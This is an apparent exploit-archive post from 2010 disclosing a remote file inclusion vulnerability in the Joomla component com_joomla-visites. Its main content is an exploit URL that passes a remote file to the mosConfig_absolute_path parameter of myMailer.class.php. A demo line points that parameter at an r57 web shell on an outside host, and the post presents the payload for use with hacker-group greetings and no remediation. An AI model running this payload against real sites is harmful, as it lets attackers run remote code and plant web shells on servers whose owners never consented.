Joomla Component (com_joomla-visites) Remote File inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component (com_joomla-visites) Remote File inclusion Vulnerability
# Published : 2010-07-26
# Author : Li0n-PaL
# Previous Title : Joomla Component (com_joomdle) SQL Injection Vulnerability
# Next Title : nuBuilder 10.04.20 Local File Inclusion Vulnerability

==========================================================
Joomla Component(com_joomla-visites) RFI
===========================================================
 
                                          Pal-Li0ns Cr3w , HacKTeach LoverzZ
                                                                                          
+===================================================================================+
[?]Joomla Component(com_joomla-visites) RFI
+===================================================================================+
    [?] My home:              [HacKTeach.org & Pal-Li0ns.com           ]
    [?] For Ask:              [F5w@hotmail.com                         ]
    [?] Script:               [     joomla                             ]
    [?] home Script           [ http://www.joomla.it                   ]
    [?] Language:             [ PHP                                    ]
    [?] Founder:              [ Li0n-PaL                               ]
    [?] Greatz to:            [ Pal-Li0n - Red-D3v1L - ShaDow-D3v1L - Cold-z3ro - storm - Mr.NJ -]
 
===[ Exploit  ]===
http://localhost//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[shell.txt?]
 
DeMo ~
 
http://www.site.com//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.site.com/r57.txt?
 
 
EnJoY o_O
 
---------------------------------------------------------
 
./exit